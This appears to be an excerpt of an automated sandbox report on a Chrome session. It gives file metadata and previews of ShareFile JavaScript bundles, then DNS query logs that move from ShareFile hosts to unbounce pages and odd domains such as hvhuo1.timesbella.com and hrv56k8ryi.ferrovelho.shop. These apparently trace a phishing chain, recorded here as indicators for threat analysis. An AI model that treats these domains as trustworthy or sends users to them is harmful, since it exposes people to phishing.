                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevdynamicformspilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var r={},n={},o={},i={},a={},s={},c={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(c,"__esModule",{value:!0}),{setters:[function(e){r.ItemsEntity=e.ItemsEntity,r.Uploader=e.Uploader,r.UserRole=e.UserRole,r.UsersEntity=e.UsersEntity,r.ZoneService=e.ZoneService,r.createFile=e.createFile},function(e){n.colorPalette=e.colorPalette,n.sizes=e.sizes},function(e){o.Alert=e.Alert,o.Badge=e.Badge,o.Breadcrumb=e.Breadcrumb,o.Button=e.Button,o.Card=e.Card,o.Checkbox=e.Checkbox,o.Col=e.Col,o.Collapse=e.Collapse,o.DatePicker=e.DatePicker,o.Divider=e.Divider,o.Drawer=e.Drawer,o.Dropdown=e.Dropdown,o.Empty=e.Empty,o.Flex=e.Flex,o.Form=e.Form,o.Input=e.Input,o.InputNumber=e.InputNumber,o.Layout=e.Layout,o.Modal=e.Modal,o.Pagination=e.Pagination,o.Popconfirm=e.Popconfirm,o.Progr
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (65453)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):91744
                                                                                                                                                                                                                                                                                Entropy (8bit):5.35315025267453
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:15K9Coppx4UK/l6XHUlMDltJXhIWDUXjak3//+nOa:15K9CoppmZ/lyLDlGonk3G
                                                                                                                                                                                                                                                                                MD5:EC10A08ABEEA396244C7C88FFAA5ECF7
                                                                                                                                                                                                                                                                                SHA1:29EA05BFC2B2A754AE77DF48FEBAC23A79352C48
                                                                                                                                                                                                                                                                                SHA-256:E4126A1DD61B9AB0EB21038540041710DDCBDCD5E03C0D7C302F74E25EF34B8E
                                                                                                                                                                                                                                                                                SHA-512:23B746B157D1DD8A2896FEDD3A86CDF13A755353FF7F9BB87A339CBE194B844B0EAEE32F038F73254BB355BEA29D02052496B28D0FB29EECA85B2CA29D343B1A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-user-act-hist-pilet/1.7.0/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevuseracthistpilet,{}).System.register(["antd","react","react-dom","tslib"],(function(e,t){var r={},n={},o={},i={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){r.Alert=e.Alert,r.Button=e.Button,r.Modal=e.Modal,r.Skeleton=e.Skeleton,r.Spin=e.Spin,r.Tabs=e.Tabs,r.Tag=e.Tag},function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){o["default"]=e["default"],o.findDOMNode=e.findDOMNode,o.flushSync=e.flushSync},function(e){i.__awaiter=e.__awaiter,i.__rest=e.__rest}],execute:function(){e((()=>{var e,s,a={5916:(e,t,r)=>{"use strict";r.d(t,{XK:()=>C,jK:()=>x});var n=r(8830),o=r.n(n),i=r(4193),s=undefined&&undefined.__assign||function(){return s=Object.assign||function(e){for(var t,r=1,n=arguments.length;r<n;r++)for(var o in t=arguments[r])Object.prototype.hasOwnProperty.call(t,o)&&(e[o]=t[o]);return e},s.apply(this,arguments)};function a(e){return Promise.resolve(o()({method:e.method,url:e.url,withCredential
                                                                                                                                                                                                                                                                                No static file info
                                                                                                                                                                                                                                                                                Icon Hash:00b29a8e86828200
                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:04.339423895 CEST192.168.2.61.1.1.10x4aecStandard query (0)premierbb.sharefile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:04.339648962 CEST192.168.2.61.1.1.10xbd15Standard query (0)premierbb.sharefile.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:05.292295933 CEST192.168.2.61.1.1.10xd83bStandard query (0)0093b71e39a6.us-east-1.sdk.awswaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:05.292788982 CEST192.168.2.61.1.1.10xdac3Standard query (0)0093b71e39a6.us-east-1.sdk.awswaf.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:06.229547024 CEST192.168.2.61.1.1.10xae40Standard query (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:06.229851007 CEST192.168.2.61.1.1.10x4a1cStandard query (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:06.909971952 CEST192.168.2.61.1.1.10xd930Standard query (0)premierbb.sharefile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:06.910231113 CEST192.168.2.61.1.1.10xc14eStandard query (0)premierbb.sharefile.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:07.030771017 CEST192.168.2.61.1.1.10xd880Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:07.031193018 CEST192.168.2.61.1.1.10xcd84Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:09.425472975 CEST192.168.2.61.1.1.10x3da4Standard query (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:09.426001072 CEST192.168.2.61.1.1.10xe2b1Standard query (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:10.220232964 CEST192.168.2.61.1.1.10xa4bStandard query (0)app.launchdarkly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:10.220431089 CEST192.168.2.61.1.1.10x4b2bStandard query (0)app.launchdarkly.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:10.245346069 CEST192.168.2.61.1.1.10x91edStandard query (0)premierbb.sf-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:10.245676041 CEST192.168.2.61.1.1.10x5827Standard query (0)premierbb.sf-api.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:10.249392033 CEST192.168.2.61.1.1.10x183aStandard query (0)citrix-sharefile-content.customer.pendo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:10.249929905 CEST192.168.2.61.1.1.10x4478Standard query (0)citrix-sharefile-content.customer.pendo.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.181534052 CEST192.168.2.61.1.1.10x6041Standard query (0)premierbb.sf-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.181646109 CEST192.168.2.61.1.1.10xa4ffStandard query (0)premierbb.sf-api.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.282085896 CEST192.168.2.61.1.1.10xae06Standard query (0)piletfeed-cdn.sharefile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.282418013 CEST192.168.2.61.1.1.10x3eecStandard query (0)piletfeed-cdn.sharefile.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.573200941 CEST192.168.2.61.1.1.10x6b34Standard query (0)o49063.ingest.sentry.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.573609114 CEST192.168.2.61.1.1.10x3ecdStandard query (0)o49063.ingest.sentry.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.734287977 CEST192.168.2.61.1.1.10xefb5Standard query (0)app.launchdarkly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.734401941 CEST192.168.2.61.1.1.10x142fStandard query (0)app.launchdarkly.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.777534008 CEST192.168.2.61.1.1.10xbbacStandard query (0)citrix-sharefile-content.customer.pendo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.777733088 CEST192.168.2.61.1.1.10xa22eStandard query (0)citrix-sharefile-content.customer.pendo.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:12.281205893 CEST192.168.2.61.1.1.10x883bStandard query (0)o49063.ingest.sentry.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:12.281420946 CEST192.168.2.61.1.1.10x9ecfStandard query (0)o49063.ingest.sentry.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:12.607634068 CEST192.168.2.61.1.1.10x58b7Standard query (0)piletfeed-cdn.sharefile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:12.607763052 CEST192.168.2.61.1.1.10xa6d5Standard query (0)piletfeed-cdn.sharefile.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:29.666106939 CEST192.168.2.61.1.1.10xde1eStandard query (0)events.launchdarkly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:29.666379929 CEST192.168.2.61.1.1.10x4dbeStandard query (0)events.launchdarkly.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:29.685350895 CEST192.168.2.61.1.1.10xa90bStandard query (0)js-agent.newrelic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:29.685350895 CEST192.168.2.61.1.1.10xc1faStandard query (0)js-agent.newrelic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:30.593646049 CEST192.168.2.61.1.1.10xce2Standard query (0)js-agent.newrelic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:30.593990088 CEST192.168.2.61.1.1.10x7780Standard query (0)js-agent.newrelic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:31.412307978 CEST192.168.2.61.1.1.10x85e0Standard query (0)bam.nr-data.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:31.412563086 CEST192.168.2.61.1.1.10x79e2Standard query (0)bam.nr-data.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:32.224412918 CEST192.168.2.61.1.1.10x1299Standard query (0)bam.nr-data.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:32.224912882 CEST192.168.2.61.1.1.10xfdb3Standard query (0)bam.nr-data.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:32.289267063 CEST192.168.2.61.1.1.10xb7b0Standard query (0)citrix-sharefile-data.customer.pendo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:32.289526939 CEST192.168.2.61.1.1.10x56feStandard query (0)citrix-sharefile-data.customer.pendo.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:33.130603075 CEST192.168.2.61.1.1.10x6d4fStandard query (0)citrix-sharefile-data.customer.pendo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:33.130758047 CEST192.168.2.61.1.1.10x53daStandard query (0)citrix-sharefile-data.customer.pendo.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:36.478033066 CEST192.168.2.61.1.1.10xf1e4Standard query (0)sf-cv.sharefile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:36.478480101 CEST192.168.2.61.1.1.10xcbf1Standard query (0)sf-cv.sharefile.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:39.019491911 CEST192.168.2.61.1.1.10x80bcStandard query (0)sf-cv.sharefile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:39.020067930 CEST192.168.2.61.1.1.10xdb51Standard query (0)sf-cv.sharefile.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:46.313432932 CEST192.168.2.61.1.1.10x4b0fStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:46.313647985 CEST192.168.2.61.1.1.10xfcc1Standard query (0)api.ipify.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:46.314143896 CEST192.168.2.61.1.1.10xe869Standard query (0)sf-renderx-us-east-1.sharefile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:46.314445019 CEST192.168.2.61.1.1.10xc82cStandard query (0)sf-renderx-us-east-1.sharefile.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:47.046735048 CEST192.168.2.61.1.1.10x6aaeStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:47.047120094 CEST192.168.2.61.1.1.10x674aStandard query (0)api.ipify.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:47.148261070 CEST192.168.2.61.1.1.10xdd65Standard query (0)sf-renderx-us-east-1.sharefile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:47.148716927 CEST192.168.2.61.1.1.10x3eccStandard query (0)sf-renderx-us-east-1.sharefile.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:49.339560986 CEST192.168.2.61.1.1.10x3f14Standard query (0)sf-temp-us-east-1-production.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:49.339993000 CEST192.168.2.61.1.1.10x8ad3Standard query (0)sf-temp-us-east-1-production.s3.amazonaws.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:53.487504005 CEST192.168.2.61.1.1.10x19a5Standard query (0)storage-cf-us.sharefile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:53.487859964 CEST192.168.2.61.1.1.10xd6e2Standard query (0)storage-cf-us.sharefile.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:28.431057930 CEST192.168.2.61.1.1.10x5186Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:35.142945051 CEST192.168.2.61.1.1.10xeb10Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:48.966931105 CEST192.168.2.61.1.1.10x5b42Standard query (0)unbouncepages.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:48.967369080 CEST192.168.2.61.1.1.10x1f60Standard query (0)unbouncepages.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:48.968539953 CEST192.168.2.61.1.1.10x3616Standard query (0)unbouncepages.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:48.968741894 CEST192.168.2.61.1.1.10xecbaStandard query (0)unbouncepages.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.510159969 CEST192.168.2.61.1.1.10x1effStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.510730028 CEST192.168.2.61.1.1.10xa95cStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.740799904 CEST192.168.2.61.1.1.10xb282Standard query (0)builder-assets.unbounce.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.740799904 CEST192.168.2.61.1.1.10xb3c8Standard query (0)builder-assets.unbounce.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.225778103 CEST192.168.2.61.1.1.10xaa90Standard query (0)unbouncepages.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.231297016 CEST192.168.2.61.1.1.10xcc53Standard query (0)unbouncepages.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.721524000 CEST192.168.2.61.1.1.10x68feStandard query (0)hvhuo1.timesbella.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.722038031 CEST192.168.2.61.1.1.10xe00aStandard query (0)hvhuo1.timesbella.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.763839960 CEST192.168.2.61.1.1.10x828fStandard query (0)hvhuo1.timesbella.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.764013052 CEST192.168.2.61.1.1.10xdb60Standard query (0)hvhuo1.timesbella.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.333523989 CEST192.168.2.61.1.1.10xe680Standard query (0)builder-assets.unbounce.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.334322929 CEST192.168.2.61.1.1.10x71caStandard query (0)builder-assets.unbounce.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:56.590215921 CEST192.168.2.61.1.1.10x3ce7Standard query (0)hrv56k8ryi.ferrovelho.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:56.590588093 CEST192.168.2.61.1.1.10x1fb3Standard query (0)hrv56k8ryi.ferrovelho.shop65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:58.061300993 CEST192.168.2.61.1.1.10x9b3bStandard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:58.061530113 CEST192.168.2.61.1.1.10x4a8cStandard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:59.224886894 CEST192.168.2.61.1.1.10x4264Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:59.418761015 CEST192.168.2.61.1.1.10x4435Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:59.419472933 CEST192.168.2.61.1.1.10xef2eStandard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:06.101922035 CEST192.168.2.61.1.1.10x269Standard query (0)hrv56k8ryi.ferrovelho.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:06.102071047 CEST192.168.2.61.1.1.10xf98eStandard query (0)hrv56k8ryi.ferrovelho.shop65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:07.853612900 CEST192.168.2.61.1.1.10xdb5fStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:07.853771925 CEST192.168.2.61.1.1.10xb69eStandard query (0)api.ipify.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:10.003371954 CEST192.168.2.61.1.1.10x6dcbStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:10.003540039 CEST192.168.2.61.1.1.10x7c20Standard query (0)api.ipify.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:22.372490883 CEST192.168.2.61.1.1.10x3561Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:41.158986092 CEST192.168.2.61.1.1.10xece8Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:57.477579117 CEST192.168.2.61.1.1.10xb533Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:57.493176937 CEST192.168.2.61.1.1.10x1Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:04.358072042 CEST1.1.1.1192.168.2.60x4aecNo error (0)premierbb.sharefile.com13.248.193.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:04.358072042 CEST1.1.1.1192.168.2.60x4aecNo error (0)premierbb.sharefile.com76.223.1.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:05.306318998 CEST1.1.1.1192.168.2.60xd83bNo error (0)0093b71e39a6.us-east-1.sdk.awswaf.com18.239.83.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:05.306318998 CEST1.1.1.1192.168.2.60xd83bNo error (0)0093b71e39a6.us-east-1.sdk.awswaf.com18.239.83.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:05.306318998 CEST1.1.1.1192.168.2.60xd83bNo error (0)0093b71e39a6.us-east-1.sdk.awswaf.com18.239.83.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:05.306318998 CEST1.1.1.1192.168.2.60xd83bNo error (0)0093b71e39a6.us-east-1.sdk.awswaf.com18.239.83.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:06.254538059 CEST1.1.1.1192.168.2.60xae40No error (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.com18.173.205.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:06.254538059 CEST1.1.1.1192.168.2.60xae40No error (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.com18.173.205.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:06.254538059 CEST1.1.1.1192.168.2.60xae40No error (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.com18.173.205.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:06.254538059 CEST1.1.1.1192.168.2.60xae40No error (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.com18.173.205.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:06.927180052 CEST1.1.1.1192.168.2.60xd930No error (0)premierbb.sharefile.com76.223.1.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:06.927180052 CEST1.1.1.1192.168.2.60xd930No error (0)premierbb.sharefile.com13.248.193.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:07.039763927 CEST1.1.1.1192.168.2.60xcd84No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:07.040215969 CEST1.1.1.1192.168.2.60xd880No error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:09.439152956 CEST1.1.1.1192.168.2.60x3da4No error (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.com18.173.205.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:09.439152956 CEST1.1.1.1192.168.2.60x3da4No error (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.com18.173.205.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:09.439152956 CEST1.1.1.1192.168.2.60x3da4No error (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.com18.173.205.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:09.439152956 CEST1.1.1.1192.168.2.60x3da4No error (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.com18.173.205.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:10.227226019 CEST1.1.1.1192.168.2.60xa4bNo error (0)app.launchdarkly.comc3.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:10.227927923 CEST1.1.1.1192.168.2.60x4b2bNo error (0)app.launchdarkly.comc3.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:10.258639097 CEST1.1.1.1192.168.2.60x183aNo error (0)citrix-sharefile-content.customer.pendo.io5352587489443840-content.customer.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:10.258639097 CEST1.1.1.1192.168.2.60x183aNo error (0)5352587489443840-content.customer.pendo.iocdn-cname.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:10.258639097 CEST1.1.1.1192.168.2.60x183aNo error (0)cdn-cname.pendo.io51.138.111.34.bc.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:10.258639097 CEST1.1.1.1192.168.2.60x183aNo error (0)51.138.111.34.bc.googleusercontent.com34.111.138.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:10.261823893 CEST1.1.1.1192.168.2.60x91edNo error (0)premierbb.sf-api.com76.223.1.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:10.261823893 CEST1.1.1.1192.168.2.60x91edNo error (0)premierbb.sf-api.com13.248.193.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:10.315948009 CEST1.1.1.1192.168.2.60x4478No error (0)citrix-sharefile-content.customer.pendo.io5352587489443840-content.customer.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:10.315948009 CEST1.1.1.1192.168.2.60x4478No error (0)5352587489443840-content.customer.pendo.iocdn-cname.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:10.315948009 CEST1.1.1.1192.168.2.60x4478No error (0)cdn-cname.pendo.io51.138.111.34.bc.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.199968100 CEST1.1.1.1192.168.2.60x6041No error (0)premierbb.sf-api.com76.223.1.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.199968100 CEST1.1.1.1192.168.2.60x6041No error (0)premierbb.sf-api.com13.248.193.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.298762083 CEST1.1.1.1192.168.2.60xae06No error (0)piletfeed-cdn.sharefile.io13.224.189.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.298762083 CEST1.1.1.1192.168.2.60xae06No error (0)piletfeed-cdn.sharefile.io13.224.189.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.298762083 CEST1.1.1.1192.168.2.60xae06No error (0)piletfeed-cdn.sharefile.io13.224.189.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.298762083 CEST1.1.1.1192.168.2.60xae06No error (0)piletfeed-cdn.sharefile.io13.224.189.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.595592022 CEST1.1.1.1192.168.2.60x6b34No error (0)o49063.ingest.sentry.io34.120.195.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.742575884 CEST1.1.1.1192.168.2.60xefb5No error (0)app.launchdarkly.comc3.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:05:11.742819071 CEST1.1.1.1192.168.2.60x142fNo error (0)app.launchdarkly.comc3.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
